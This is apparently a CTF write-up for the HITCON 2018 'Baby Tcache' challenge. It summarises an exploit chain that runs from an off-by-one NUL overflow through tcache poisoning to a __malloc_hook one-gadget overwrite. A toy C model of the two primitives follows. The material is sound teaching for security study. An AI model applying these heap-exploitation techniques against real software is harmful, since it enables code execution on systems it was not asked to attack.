Get overlapping chunks thanks to an off-by-one NULL byte overflow, use them to poison the tcache so that malloc returns chunks at arbitrary addresses, and finally overwrite __malloc_hook with the address of a one-gadget. Since we didn't think leaking data was possible (spoiler: it was; check out the [intended solution](https://github.com/scwuaptx/CTF/blob/master/2018-writeup/hitcon/baby_tcache.py) or the [write-up by bi0s](https://ctftime.org/writeup/11945)), we brute-forced 12 bits of libc addresses (doable, but not for the faint of heart :D).
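As an added illustration (not code from this write-up, the intended solution, or the challenge binary), the C program below models the two primitives the summary chains together: the off-by-one NUL byte landing on the low byte of the neighbouring chunk's size field, and tcache poisoning of a pre-safe-linking (glibc 2.26 to 2.31 era) bin, where the freelist link lives in the freed chunk's user data and is popped without validation. The allocator, the `heap` buffer and the `fake_hook` target are constructed stand-ins, not glibc; the overlapping-chunk construction that gives write access to a freed chunk, and the real `__malloc_hook` / one-gadget overwrite, are assumed rather than modelled.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Toy model of a tcache bin before safe-linking. Constructed for
 * illustration; none of this is glibc code. A chunk is
 * [prev_size:8][size:8][user data...]; a freed chunk keeps its tcache
 * "next" link in the first 8 bytes of user data, and malloc() pops that
 * link without checking where it points. */

#define HDR        16        /* prev_size + size */
#define PREV_INUSE 1
#define TCACHE_MAX 7

static _Alignas(16) uint8_t heap[4096];  /* constructed stand-in heap */
static size_t  heap_top;                 /* offset of the next fresh chunk */
static void   *tcache_head;              /* one bin; glibc has one per size class */
static int     tcache_count;

static uint64_t chunk_size(const void *user) {
    return *(const uint64_t *)((const uint8_t *)user - 8);
}

static void *model_malloc(size_t req) {
    if (tcache_count > 0) {                 /* LIFO pop, link trusted blindly */
        void *p = tcache_head;
        tcache_head = *(void **)p;
        tcache_count--;
        return p;
    }
    size_t csz = (req + 8 + 15) & ~(size_t)15;   /* glibc-style rounding */
    if (csz < 32) csz = 32;
    uint8_t *hdr = heap + heap_top;
    *(uint64_t *)(hdr + 8) = csz | PREV_INUSE;
    heap_top += csz;
    return hdr + HDR;
}

static void model_free(void *user) {
    if (tcache_count >= TCACHE_MAX) return;  /* bin full: glibc uses other bins */
    *(void **)user = tcache_head;            /* link stored inside user data */
    tcache_head = user;
    tcache_count++;
}

/* The bug class: copy len bytes, then a terminating NUL, into a buffer that
 * only holds len bytes. The NUL lands on the low byte of the next chunk's
 * size field. */
static void vuln_copy(void *dst, const void *src, size_t len) {
    memcpy(dst, src, len);
    ((uint8_t *)dst)[len] = 0;
}

/* Step 1: the off-by-one NUL clears PREV_INUSE on the neighbour and shrinks
 * its size. Returns the neighbour's size field after the overflow. */
static uint64_t off_by_one_demo(void) {
    char payload[24];
    memset(payload, 'A', sizeof payload);
    void *a = model_malloc(24);     /* 0x20 chunk: user data ends at a+24 */
    void *b = model_malloc(0xf8);   /* 0x100 chunk, size field 0x101 */
    vuln_copy(a, payload, sizeof payload);   /* NUL hits b's size byte */
    return chunk_size(b);           /* 0x101 becomes 0x100 */
}

/* Step 2: tcache poisoning. Given a write into a freed chunk's user data
 * (in the challenge, via an overlapping chunk), rewrite its link so the
 * second allocation returns an attacker-chosen address. */
static uint8_t fake_hook[16];   /* constructed stand-in for __malloc_hook's slot */

static void *poison_demo(void) {
    void *a = model_malloc(0x48);
    void *b = model_malloc(0x48);
    model_free(b);
    model_free(a);                  /* bin: a -> b -> NULL */
    *(void **)a = fake_hook;        /* corrupt a's link through the overlap */
    (void)model_malloc(0x48);       /* pops a; head now points at fake_hook */
    return model_malloc(0x48);      /* returns fake_hook: arbitrary write */
}

int main(void) {
    printf("neighbour size after off-by-one: 0x%llx\n",
           (unsigned long long)off_by_one_demo());
    void *p = poison_demo();
    printf("poisoned allocation at %p (target %p)\n", p, (void *)fake_hook);
    return 0;
}
```

The model deliberately omits the checks later glibc versions added (the `key` field against double frees in 2.29, safe-linking of the `next` pointer in 2.32), which is why the same chain needs a heap leak on modern libc.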

Original writeup (https://github.com/integeruser/on-pwning/blob/master/2018-hitcon/Baby-Tcache/baby_tcache.py).